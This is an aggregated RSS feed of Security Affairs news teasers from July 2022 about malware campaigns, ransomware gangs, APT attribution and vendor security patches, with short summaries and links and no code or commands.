www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
2024-05-13T05:07:09+00:00 www.secnews.physaphae.fr

Security Affairs - Blog Secu
DUCKTAIL operation targets Facebook's Business and Ad accounts
Researchers uncovered an ongoing operation, codenamed DUCKTAIL, that targets Facebook Business and Ad accounts. Researchers from WithSecure (formerly F-Secure Business) have discovered an ongoing operation, named DUCKTAIL, that targets individuals and organizations that operate on Facebook's Business and Ads platform. Experts attribute the campaign to a Vietnamese financially motivated threat actor that is suspected to […]
2022-07-27T14:51:28+00:00 https://securityaffairs.co/wordpress/133715/malware/ducktail-operation-facebook-business.html www.secnews.physaphae.fr/article.php?IdArticle=5970569 False Threat None None

Security Affairs - Blog Secu
The strange similarities between LockBit 3.0 and BlackMatter ransomware
Researchers found similarities between the LockBit 3.0 ransomware and BlackMatter, which is a rebranded variant of the DarkSide ransomware. Cybersecurity researchers have found similarities between the latest version of the LockBit ransomware, LockBit 3.0, and the BlackMatter ransomware. The LockBit 3.0 ransomware was released in June with important novelties such as a bug bounty program, Zcash payment, and new extortion […]
2022-07-27T11:25:33+00:00 https://securityaffairs.co/wordpress/133697/malware/lockbit-3-0-blackmatter-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5968116 False Ransomware None 3.0000000000000000

Security Affairs - Blog Secu
U.S. increased rewards for info on North Korea-linked threat actors to $10 million
The U.S. State Department increased rewards for information on any North Korea-linked threat actors to $10 million. In April 2020, the U.S.
Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation released a joint advisory warning organizations worldwide about the 'significant cyber threat' posed by North Korean nation-state actors […]
2022-07-26T18:57:31+00:00 https://securityaffairs.co/wordpress/133688/apt/us-north-korea-rewards.html www.secnews.physaphae.fr/article.php?IdArticle=5955290 False Threat None None

Security Affairs - Blog Secu
Threat actors leverage DLL side-loading to spread Qakbot malware
Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading attacks. Dynamic-link library (DLL) side-loading is an attack method that takes advantage of how Microsoft Windows applications handle DLL […]
2022-07-26T16:14:12+00:00 https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html www.secnews.physaphae.fr/article.php?IdArticle=5953000 False Malware None None

Security Affairs - Blog Secu
Zero-day attacks target online stores using PrestaShop
Threat actors are exploiting a zero-day vulnerability to steal payment information from sites using the open source e-commerce platform PrestaShop. Threat actors are targeting websites using the open source e-commerce platform PrestaShop by exploiting a zero-day flaw, tracked as CVE-2022-36408, that can allow them to execute arbitrary code and potentially steal customers' payment information.
PrestaShop is currently used by 300,000 shops worldwide […]
2022-07-26T06:22:58+00:00 https://securityaffairs.co/wordpress/133669/hacking/prestashop-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=5946467 False Vulnerability,Threat None None

Security Affairs - Blog Secu
CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China
Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […]
2022-07-25T23:10:18+00:00 https://securityaffairs.co/wordpress/133658/malware/cosmicstrand-uefi-firmware-rootkit.html www.secnews.physaphae.fr/article.php?IdArticle=5944102 False Malware,Threat None None

Security Affairs - Blog Secu
Flaws in FileWave MDM could have allowed hacking +1000 organizations
Multiple flaws in the FileWave mobile device management (MDM) product exposed organizations to cyberattacks. Claroty researchers discovered two vulnerabilities in the FileWave MDM product that exposed more than one thousand organizations to cyber attacks. FileWave MDM is used by organizations to view and manage device configurations, locations, security settings, and other device data. An organization may […]
2022-07-25T18:00:48+00:00 https://securityaffairs.co/wordpress/133649/hacking/filewave-mdm-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5941635 False None None None

Security Affairs - Blog Secu
Lockbit ransomware gang claims to have breached the Italian Revenue Agency
The ransomware group Lockbit claims to have stolen 78 GB of files from the Italian Revenue Agency (Agenzia delle Entrate).
The ransomware gang Lockbit claims to have hacked the Italian Revenue Agency (Agenzia delle Entrate) and added the government agency to the list of victims reported on its dark web leak site. “The Revenue Agency, operational since 1 January […]
2022-07-25T11:01:11+00:00 https://securityaffairs.co/wordpress/133640/cyber-crime/lockbit-ransomware-italian-revenue-agency.html www.secnews.physaphae.fr/article.php?IdArticle=5938781 False Ransomware None None

Security Affairs - Blog Secu
Amadey malware spreads via software cracks laced with SmokeLoader
Operators behind the Amadey Bot malware use SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is a data-stealing malware that was first spotted in 2018; it also allows operators to install additional payloads. The malware is available for sale in illegal forums; in the past, it was used […]
2022-07-25T06:27:21+00:00 https://securityaffairs.co/wordpress/133617/cyber-crime/amadey-malware-spreads-smokeloader.html www.secnews.physaphae.fr/article.php?IdArticle=5936287 False Malware None None

Security Affairs - Blog Secu
Drupal developers fixed a code execution flaw in the popular CMS
The Drupal development team released security updates to fix multiple issues, including a critical code execution flaw. Drupal developers have released security updates to address multiple vulnerabilities in the popular CMS: Drupal core – Moderately critical – Multiple vulnerabilities – SA-CORE-2022-015; Drupal core – Critical – Arbitrary PHP code execution – SA-CORE-2022-014; Drupal core – Moderately […]
2022-07-25T06:21:14+00:00 https://securityaffairs.co/wordpress/133625/security/drupal-flaws-2.html www.secnews.physaphae.fr/article.php?IdArticle=5936288 False None None None

Security Affairs - Blog Secu
Is APT28 behind the STIFF#BIZON attacks attributed to North Korea-linked APT37?
The North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries.
Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in multiple countries, including the Czech Republic and Poland. The researchers attribute this campaign to the North Korea-linked APT37 group, aka […]
2022-07-24T13:53:53+00:00 https://securityaffairs.co/wordpress/133605/apt/apt37-stiffbizon-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=5923023 False Threat,Cloud APT 37,APT 28 None

Security Affairs - Blog Secu
A database containing data of 5.4 million Twitter accounts available for sale
A threat actor leaked data of 5.4 million Twitter users that was obtained by exploiting a now-patched flaw in the popular platform. A threat actor has leaked data of 5.4 million Twitter accounts that was obtained by exploiting a now-fixed vulnerability in the popular social media platform. The threat actor is now offering for sale […]
2022-07-24T08:29:58+00:00 https://securityaffairs.co/wordpress/133593/data-breach/twitter-leaked-data.html www.secnews.physaphae.fr/article.php?IdArticle=5918894 False Vulnerability,Threat None None

Security Affairs - Blog Secu
FBI seized $500,000 worth of bitcoin obtained from Maui ransomware attacks
The U.S. DoJ seized $500,000 worth of Bitcoin from the North Korea-linked threat actors behind the Maui ransomware. The U.S. Department of Justice (DoJ) has seized $500,000 worth of Bitcoin from North Korean threat actors who used the Maui ransomware to target several organizations worldwide.
“The Justice Department today announced a complaint filed in […]
2022-07-23T18:27:23+00:00 https://securityaffairs.co/wordpress/133587/cyber-warfare-2/fbi-seized-bitcoin-maui-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5906151 False Ransomware,Threat None None

Security Affairs - Blog Secu
SonicWall fixed critical SQLi in Analytics and GMS products
Security company SonicWall released updates to address a critical SQL injection (SQLi) flaw in its Analytics On-Prem and Global Management System (GMS) products. SonicWall addressed a critical SQL injection (SQLi) vulnerability, tracked as CVE-2022-22280 (CVSS score 9.4), in the Analytics On-Prem and Global Management System (GMS) products. “Improper Neutralization of Special Elements used in an […]
2022-07-23T05:00:47+00:00 https://securityaffairs.co/wordpress/133579/security/sonicwall-critical-sqli.html www.secnews.physaphae.fr/article.php?IdArticle=5892939 False None None None

Security Affairs - Blog Secu
Account lockout policy in Windows 11 is enabled by default to block brute force attacks
Starting with Windows 11, Microsoft enables by default an account lockout policy that can block brute force attacks. Starting with Windows 11 Insider Preview build 22528.1000, the OS ships with an account lockout policy enabled by default to block brute force attacks.
The lockout policy was set to limit the number of failed sign-in attempts to […]
2022-07-22T18:51:02+00:00 https://securityaffairs.co/wordpress/133568/security/windows-account-lockout-policy.html www.secnews.physaphae.fr/article.php?IdArticle=5882955 False None None None

Security Affairs - Blog Secu
Hackers breached Ukrainian radio station to spread fake news about Zelensky's health
2022-07-22T11:27:57+00:00 https://securityaffairs.co/wordpress/133559/hacking/radio-hacked-fake-news-zelensky-health.html www.secnews.physaphae.fr/article.php?IdArticle=5876180 False Threat None None

Security Affairs - Blog Secu
Candiru surveillance spyware DevilsTongue exploited Chrome zero-day to target journalists
The spyware developed by Israeli surveillance firm Candiru exploited the recently fixed CVE-2022-2294 Chrome zero-day in attacks on journalists. Researchers from the antivirus firm Avast reported that the DevilsTongue spyware, developed by Israeli surveillance firm Candiru, was used in attacks against journalists in the Middle East and exploited the recently fixed CVE-2022-2294 Chrome zero-day. The flaw, which […]
2022-07-22T08:32:11+00:00 https://securityaffairs.co/wordpress/133546/intelligence/candiru-chrome-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=5873279 False None None None

Security Affairs - Blog Secu
TA4563 group leverages EvilNum malware to target European financial and investment entities
A threat actor tracked as TA4563 is using the EvilNum malware to target European financial and investment entities. The threat actor, tracked as TA4563, leverages the EvilNum malware to target European financial and investment entities, Proofpoint reported. The group focuses on entities with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi).
EvilNum is a […]
2022-07-22T05:45:39+00:00 https://securityaffairs.co/wordpress/133535/apt/ta4563-group-evilnum-malware.html www.secnews.physaphae.fr/article.php?IdArticle=5870359 True Malware,Threat None None

Security Affairs - Blog Secu
Threat actors target software firm in Ukraine using GoMet backdoor
Threat actors targeted a large software development company in Ukraine using the GoMet backdoor. Researchers from Cisco Talos discovered an uncommon piece of malware that was employed in an attack against a large Ukrainian software development company. The company produces software that is used by various state organizations in Ukraine. Researchers believe that […]
2022-07-21T20:20:16+00:00 https://securityaffairs.co/wordpress/133520/malware/attackers-target-software-firm-ukraine-gomet.html www.secnews.physaphae.fr/article.php?IdArticle=5861750 False Malware None None

Security Affairs - Blog Secu
Lightning Framework, a previously undetected malware that targets Linux systems
Researchers discovered a previously undetected malware dubbed ‘Lightning Framework’ that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious code has a modular structure and is able to install rootkits. “Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has […]
2022-07-21T17:37:51+00:00 https://securityaffairs.co/wordpress/133506/malware/lightning-framework-linux-malware.html www.secnews.physaphae.fr/article.php?IdArticle=5858907 False Malware None None

Security Affairs - Blog Secu
Atlassian patched a critical Confluence vulnerability
Atlassian released security updates to address a critical security vulnerability affecting Confluence Server and Confluence Data Center.
Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center, tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed, the Questions for Confluence […]
2022-07-21T13:49:01+00:00 https://securityaffairs.co/wordpress/133496/hacking/atlassian-confluence-server-data-center-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=5855185 False Vulnerability None None

Security Affairs - Blog Secu
Apple fixes multiple flaws in iOS, iPadOS, macOS, tvOS, and watchOS devices
Apple released security updates to address multiple vulnerabilities that affect iOS, iPadOS, macOS, tvOS, and watchOS devices. Apple released security updates to fix 37 vulnerabilities impacting iOS, iPadOS, macOS, tvOS, and watchOS devices. The flaws addressed by Apple lead to arbitrary code execution, privilege escalation, denial-of-service (DoS), and information disclosure. Below is the list of Apple […]
2022-07-21T09:22:03+00:00 https://securityaffairs.co/wordpress/133486/security/apple-security-updates.html www.secnews.physaphae.fr/article.php?IdArticle=5851466 False Guideline None None

Security Affairs - Blog Secu
8220 Gang Cloud Botnet infected 30,000 hosts globally
The crimeware group known as 8220 Gang expanded its Cloud Botnet over the last month to roughly 30,000 hosts globally. Researchers from SentinelOne reported that the low-skill crimeware group 8220 Gang has expanded its Cloud Botnet over the last month to roughly 30,000 hosts globally.
The gang focuses on infecting cloud hosts to deploy cryptocurrency miners by […]
2022-07-21T08:06:47+00:00 https://securityaffairs.co/wordpress/133462/cyber-crime/8220-gang-cloud-botnet-spike.html www.secnews.physaphae.fr/article.php?IdArticle=5850536 False None None None

Security Affairs - Blog Secu
New Luna ransomware targets Windows, Linux and ESXi systems
Kaspersky researchers discovered a new ransomware family written in Rust, named Luna, that targets Windows, Linux, and ESXi systems. Researchers from Kaspersky Lab detailed a new ransomware family named Luna, which is written in Rust and is able to target Windows, Linux, and ESXi systems. Luna ransomware is the third ransomware family that is written […]
2022-07-20T20:16:43+00:00 https://securityaffairs.co/wordpress/133454/cyber-crime/luna-ransomware-rust.html www.secnews.physaphae.fr/article.php?IdArticle=5838890 False Ransomware None None

Security Affairs - Blog Secu
Millions of vehicles can be attacked via MiCODUS MV720 GPS trackers
Multiple flaws in MiCODUS MV720 Global Positioning System (GPS) trackers shipped with over 1.5 million vehicles can allow hackers to remotely compromise them. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an advisory to warn of multiple security vulnerabilities in MiCODUS MV720 Global Positioning System (GPS) trackers, which are used by over 1.5 million vehicles. An attacker […]
2022-07-20T14:53:48+00:00 https://securityaffairs.co/wordpress/133445/hacking/micodus-tracker-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5833244 False Hack None None

Security Affairs - Blog Secu
EU warns of risks of spillover effects associated with the ongoing war in Ukraine
The Council of the European Union (EU) warns of malicious cyber activities conducted by threat actors in the context of the ongoing conflict between Russia and Ukraine.
The Council of the European Union (EU) warns of the risks associated with the malicious cyber activities conducted by threat actors in the context of the ongoing conflict […]
2022-07-20T05:51:49+00:00 https://securityaffairs.co/wordpress/133436/cyber-warfare-2/eu-warns-ukraine-spillover.html www.secnews.physaphae.fr/article.php?IdArticle=5827810 False Threat None None

Security Affairs - Blog Secu
Belgium claims China-linked APT groups hit its ministries
The Minister for Foreign Affairs of Belgium blames multiple China-linked threat actors for attacks against the country’s defense and interior ministries. The Minister for Foreign Affairs of Belgium revealed that multiple China-linked APT groups targeted the country’s defense and interior ministries. “Belgium exposes malicious cyber activities that significantly affected our sovereignty, democracy, security and society at large by targeting the […]
2022-07-20T05:39:58+00:00 https://securityaffairs.co/wordpress/133425/apt/belgium-claims-china-hit-its-ministries.html www.secnews.physaphae.fr/article.php?IdArticle=5827811 False Threat None None

Security Affairs - Blog Secu
CloudMensis spyware went undetected for many years
Researchers spotted previously undocumented spyware, dubbed CloudMensis, that targets Apple macOS systems. Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2. The malware was designed to spy on the target systems, exfiltrate documents, and acquire keystrokes and screen captures. […]
2022-07-19T20:07:23+00:00 https://securityaffairs.co/wordpress/133416/hacking/cloudmensis-spyware.html www.secnews.physaphae.fr/article.php?IdArticle=5827812 False Malware None None

Security Affairs - Blog Secu
Russia-linked APT29 relies on Google Drive, Dropbox to evade detection
The Russia-linked threat actor APT29 is using the Google Drive cloud storage service to evade detection.
Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […]
2022-07-19T13:41:49+00:00 https://securityaffairs.co/wordpress/133409/apt/apt29-google-drive-dropbox.html www.secnews.physaphae.fr/article.php?IdArticle=5825713 False Threat APT 29 None

Security Affairs - Blog Secu
Crooks create rogue cryptocurrency-themed apps to steal crypto assets from users
The U.S. FBI has warned of crooks developing malicious cryptocurrency-themed apps to steal crypto assets from users. The U.S. Federal Bureau of Investigation (FBI) has warned of crooks creating malicious cryptocurrency-themed apps to steal crypto assets from investors. Crooks contact US investors claiming to offer legitimate cryptocurrency investment services, and attempt to trick them […]
2022-07-19T10:25:34+00:00 https://securityaffairs.co/wordpress/133402/cyber-crime/fbi-rogue-cryptocurrency-themed-apps.html www.secnews.physaphae.fr/article.php?IdArticle=5824232 False None None None

Security Affairs - Blog Secu
Several apps on the Play Store used to spread Joker, Facestealer and Coper malware
Google blocked dozens of malicious apps from the official Play Store that were spreading the Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing the Joker, Facestealer, and Coper malware families. Researchers from security firm Pradeo discovered multiple apps spreading the Joker Android malware.
The […]
2022-07-19T08:44:47+00:00 https://securityaffairs.co/wordpress/133394/malware/play-store-apps-joker-facestealer-coper.html www.secnews.physaphae.fr/article.php?IdArticle=5823539 False Malware None None

Security Affairs - Blog Secu
MLNK Builder 4.2 released in Dark Web – malicious shortcut-based attacks are on the rise
Cybercriminals released a new MLNK Builder 4.2 tool for malicious shortcut (LNK) generation with an improved PowerShell and VBS obfuscator. Resecurity, Inc. (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has detected an update of one of the most popular tools used by cybercriminals to generate malicious LNK files, so frequently used for […]
2022-07-18T19:49:05+00:00 https://securityaffairs.co/wordpress/133381/cyber-crime/mlnk-builder-4-2-released-dark-web.html www.secnews.physaphae.fr/article.php?IdArticle=5819361 False Tool None None

Security Affairs - Blog Secu
Tor Browser 11.5 is optimized to automatically bypass censorship
The Tor Project team has announced the release of Tor Browser 11.5, which introduces functionalities to automatically bypass censorship. The new version of the popular privacy-oriented browser implements new features to fight censorship. With previous versions of the browser, circumventing censorship of the […]
2022-07-18T14:58:33+00:00 https://securityaffairs.co/wordpress/133371/digital-id/tor-browser-bypass-censorship.html www.secnews.physaphae.fr/article.php?IdArticle=5817059 False None None None

Security Affairs - Blog Secu
A massive cyberattack hit Albania
A synchronized criminal attack from abroad hit Albania over the weekend; all Albanian government systems were shut down following the cyberattack. Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday.
A synchronized criminal attack from abroad hit the servers of the National Agency for Information Society (AKSHI), which handles many […]
2022-07-18T11:44:08+00:00 https://securityaffairs.co/wordpress/133363/cyber-warfare-2/albania-cyber-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5816420 False None None None

Security Affairs - Blog Secu
Watch out for the CVE-2022-30136 Windows NFS remote code execution flaw
Researchers published an analysis of the Windows remote code execution vulnerability CVE-2022-30136 impacting the Network File System. Trend Micro Research has published an analysis of the recently patched Windows vulnerability CVE-2022-30136 that impacts the Network File System. CVE-2022-30136 is a remote code execution vulnerability that resides in the Windows Network File System; it is due […]
2022-07-18T10:43:56+00:00 https://securityaffairs.co/wordpress/133355/security/cve-2022-30136-windows-nfs-rce.html www.secnews.physaphae.fr/article.php?IdArticle=5815566 False Vulnerability None None

Security Affairs - Blog Secu
Graff paid a $7.5M ransom and sued its insurance firm for refusing to cover this payment
The high-end British jeweler Graff paid a £6 million ransom after the ransomware attack it suffered in 2021. In September 2021, the Conti ransomware gang hit high-society jeweler Graff and threatened to release private details of world leaders, actors and tycoons. The customers of the company are among the richest people on the globe, including […]
2022-07-18T07:23:20+00:00 https://securityaffairs.co/wordpress/133347/cyber-crime/graff-paid-a-7-5m-ransom.html www.secnews.physaphae.fr/article.php?IdArticle=5814425 False Ransomware,Guideline None None

Security Affairs - Blog Secu
Crooks stole $375k from Premint NFT, it is one of the biggest NFT hacks ever
Threat actors hacked the popular NFT platform Premint NFT and stole 314 NFTs.
The popular NFT platform Premint NFT was hacked; the threat actors compromised its official website and stole 314 NFTs. According to experts from blockchain security firm CertiK, this is one of the biggest NFT hacks on record. The analysis of the […]
2022-07-17T19:24:43+00:00 https://securityaffairs.co/wordpress/133339/cyber-crime/crooks-stole-375k-from-premint-nft-it-is-one-of-the-biggest-nft-hacks-ever.html www.secnews.physaphae.fr/article.php?IdArticle=5803062 False Threat None None

Security Affairs - Blog Secu
Google is going to remove the app permissions list from the Play Store
Google is going to remove the app permissions list from the official Play Store for both the mobile app and the web. As part of the “Data safety” initiative for the Android app on the Play Store, Google plans to remove the app permissions list from both the mobile app and the web. In April, […]
2022-07-17T17:56:22+00:00 https://securityaffairs.co/wordpress/133334/mobile-2/google-removes-app-permissions-list-play-store.html www.secnews.physaphae.fr/article.php?IdArticle=5801045 False None None None

Security Affairs - Blog Secu
APT groups have targeted journalists and media organizations since 2021
Researchers from Proofpoint warn that various APT groups have been targeting journalists and media organizations since 2021. Proofpoint researchers warn that APT groups have been regularly targeting and posing as journalists and media organizations since early 2021. The media sector is a privileged target for this category of attackers due to the access its operators have to […]
2022-07-17T04:44:08+00:00 https://securityaffairs.co/wordpress/133317/apt/apt-groups-targer-journalists.html www.secnews.physaphae.fr/article.php?IdArticle=5788067 False None None None

Security Affairs - Blog Secu
Critical flaw in Netwrix Auditor application allows arbitrary code execution
A vulnerability in the Netwrix Auditor software can be exploited to execute arbitrary code on affected devices.
Bishop Fox discovered a vulnerability in the Netwrix Auditor software that can be exploited by attackers to execute arbitrary code on affected devices. Netwrix Auditor is auditing software that allows organizations to monitor their IT infrastructure, […]
2022-07-16T19:49:50+00:00 https://securityaffairs.co/wordpress/133310/hacking/netwrix-auditor-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=5778726 False Vulnerability None None

Security Affairs - Blog Secu
CISA urges users to fix multiple critical flaws in Juniper Networks products
CISA urges admins to apply recently released fixes for Juniper Networks products, including Junos Space, Contrail Networking and NorthStar Controller. CISA urges users and administrators to review the Juniper Networks security advisories page and apply the security updates available for some products, including Junos Space, Contrail Networking and NorthStar Controller. Threat actors can exploit some of these vulnerabilities […]
2022-07-16T14:16:22+00:00 https://securityaffairs.co/wordpress/133301/security/juniper-networks-critical-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5773531 False Threat None None

Security Affairs - Blog Secu
Threat actors exploit a flaw in Digium phone software to target VoIP servers
Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium’s software to install a web shell, Palo Alto Networks warns. Recently, Unit 42 researchers spotted a campaign, active since December 2021, targeting the Elastix system used in Digium phones.
Threat actors exploited a vulnerability, tracked as CVE-2021-45461 (CVSS score 9.8), in the Rest Phone Apps (restapps) module to implant […]
2022-07-16T13:14:26+00:00 https://securityaffairs.co/wordpress/133293/hacking/digium-phones-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5772481 False Vulnerability,Threat None None

Security Affairs - Blog Secu
Tainted password-cracking software for industrial systems used to spread P2P Sality bot
Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators with Sality malware. Threat actors behind the campaign used multiple accounts across several social media platforms to advertise password-cracking software for Programmable Logic Controllers (PLC), Human-Machine […]
2022-07-15T22:27:19+00:00 https://securityaffairs.co/wordpress/133281/malware/sality-malware-industrial-systems.html www.secnews.physaphae.fr/article.php?IdArticle=5756154 False Vulnerability,Threat None None

Security Affairs - Blog Secu
Experts warn of attacks on sites using flawed Kaswara Modern WPBakery Page Builder Addons
Researchers spotted a massive campaign that scanned close to 1.6 million WordPress sites for vulnerable Kaswara Modern WPBakery Page Builder Addons. The Wordfence Threat Intelligence team observed a sudden increase in attacks targeting the Kaswara Modern WPBakery Page Builder Addons. Threat actors are attempting to exploit an arbitrary file upload vulnerability tracked as CVE-2021-24284.
The […]
2022-07-15T14:33:04+00:00 https://securityaffairs.co/wordpress/133267/hacking/wpbakery-page-builder-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5747300 False Vulnerability,Threat None None

Security Affairs - Blog Secu
Holy Ghost ransomware operation is linked to North Korea
Microsoft researchers linked the Holy Ghost ransomware (H0lyGh0st) operation to North Korea-linked threat actors. The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North Korea-linked group they track as DEV-0530. The Holy Ghost ransomware gang has been active since June 2021 and it conducted ransomware […]
2022-07-15T12:08:14+00:00 https://securityaffairs.co/wordpress/133255/hacking/holy-ghost-ransomware-north-korea.html www.secnews.physaphae.fr/article.php?IdArticle=5745126 False Ransomware,Threat None None

Security Affairs - Blog Secu
RedAlert, LILITH, and 0mega, 3 new ransomware in the wild
Cyble researchers warn of three new ransomware operations, named Lilith, RedAlert and 0mega, targeting organizations worldwide. Researchers from threat intelligence firm Cyble warn of new ransomware gangs that surfaced recently, named Lilith, RedAlert, and 0mega. RedAlert (aka N13V) targets both the Windows and Linux VMware ESXi servers of target organizations. The name RedAlert comes from a string […]
2022-07-15T07:26:04+00:00 https://securityaffairs.co/wordpress/133248/cyber-crime/lilith-redalert-0mega-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5739657 False Ransomware,Threat None None

Security Affairs - Blog Secu
Mantis botnet powered the largest HTTPS DDoS attack in June
The largest HTTPS DDoS attack recently mitigated by Cloudflare was launched by the Mantis botnet. In June 2022, DDoS mitigation firm Cloudflare announced it had mitigated the largest HTTPS DDoS attack it had seen, launched by a botnet it has called Mantis.
The Mantis botnet generated 26 million request per second using approximately 5000 hijacked virtual […] ]]> 2022-07-14T18:32:55+00:00 https://securityaffairs.co/wordpress/133233/hacking/mantis-botnet-record-ddos-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5725520 False None None None Security Affairs - Blog Secu The new Retbleed speculative execution attack impacts both Intel and AMD chips Researchers warn of a new vulnerability, dubbed Retbleed, that impacts multiple older AMD and Intel microprocessors. ETH Zurich researchers Johannes Wikner and Kaveh Razavi discovered a new vulnerability, dubbed Retbleed, that affects multiple older AMD and Intel microprocessors. An attacker can exploit the flaw to bypass current defenses and perform in Spectre-based attacks. The Retbleed vulnerability is tracked as […] ]]> 2022-07-14T16:38:02+00:00 https://securityaffairs.co/wordpress/133222/security/retbleed-speculative-execution-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5723409 False None None None Security Affairs - Blog Secu Former CIA employee Joshua Schulte was convicted of Vault 7 massive leak Former CIA programmer, Joshua Schulte, was convicted in a US federal court of the 2017 leak of a massive leak to WikiLeaks. The former CIA programmer Joshua Schulte (33) was found guilty in New York federal court of stealing the agency's hacking tools and leaking them to WikiLeaks in 2017. The huge trove of data, […] ]]> 2022-07-14T10:17:48+00:00 https://securityaffairs.co/wordpress/133225/intelligence/former-cia-joshua-schulte-convicted.html www.secnews.physaphae.fr/article.php?IdArticle=5717251 False None None None Security Affairs - Blog Secu Microsoft published exploit code for a macOS App sandbox escape flaw Microsoft published the exploit code for a vulnerability in macOS that can allow an attacker to escape the sandbox. 
Microsoft publicly disclosed technical details for an access issue vulnerability, tracked as CVE-2022-26706, that resides in the macOS App Sandbox. “Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted […] ]]> 2022-07-14T09:24:51+00:00 https://securityaffairs.co/wordpress/133211/hacking/macos-sandbox-bypass-exploit.html www.secnews.physaphae.fr/article.php?IdArticle=5717252 False Vulnerability None None Security Affairs - Blog Secu VMware fixed a flaw in vCenter Server discovered eight months ago VMware addressed a high-severity privilege escalation flaw, tracked as CVE-2021-22048, in vCenter Server IWA mechanism. VMware addressed a high-severity privilege escalation flaw, tracked as CVE-2021-22048 (CVSSv3 base score of 7.1.), in vCenter Server ‘s IWA (Integrated Windows Authentication) mechanism after eight months since its disclosure. The vulnerability can be exploited by an attacker with non-administrative […] ]]> 2022-07-14T07:42:48+00:00 https://securityaffairs.co/wordpress/133204/security/vmware-vcenter-server-flaw-2.html www.secnews.physaphae.fr/article.php?IdArticle=5714170 False Vulnerability None None Security Affairs - Blog Secu Qakbot operations continue to evolve to avoid detection Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware spreads via malspam campaigns, it inserts replies in active email threads. 
The threat continues to […] ]]> 2022-07-13T18:29:04+00:00 https://securityaffairs.co/wordpress/133191/malware/qakbot-continues-to-evolve.html www.secnews.physaphae.fr/article.php?IdArticle=5700264 False Malware,Threat None None Security Affairs - Blog Secu Three UEFI Firmware flaws found in tens of Lenovo Notebook models IT giant Lenovo released security fixes to address three vulnerabilities that impact the UEFI firmware shipped with over 70 product models. The multinational technology company Lenovo released security fixes to address three vulnerabilities that reside in the UEFI firmware shipped with over 70 product models, including several ThinkBook models. A remote attacker can trigger these […] ]]> 2022-07-13T14:46:34+00:00 https://securityaffairs.co/wordpress/133186/security/lenovo-uefi-firmware-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5696205 False None None None Security Affairs - Blog Secu Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021 A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user's sign-in session, and bypass the authentication process even when the victim has enabled the MFA. In AiTM phishing, threat actors set up a proxy […] ]]> 2022-07-13T05:56:54+00:00 https://securityaffairs.co/wordpress/133154/hacking/aitm-phishing-campaigns.html www.secnews.physaphae.fr/article.php?IdArticle=5684511 False Threat None None Security Affairs - Blog Secu The President of European Central Bank Christine Lagarde targeted by hackers Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt. The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt. 
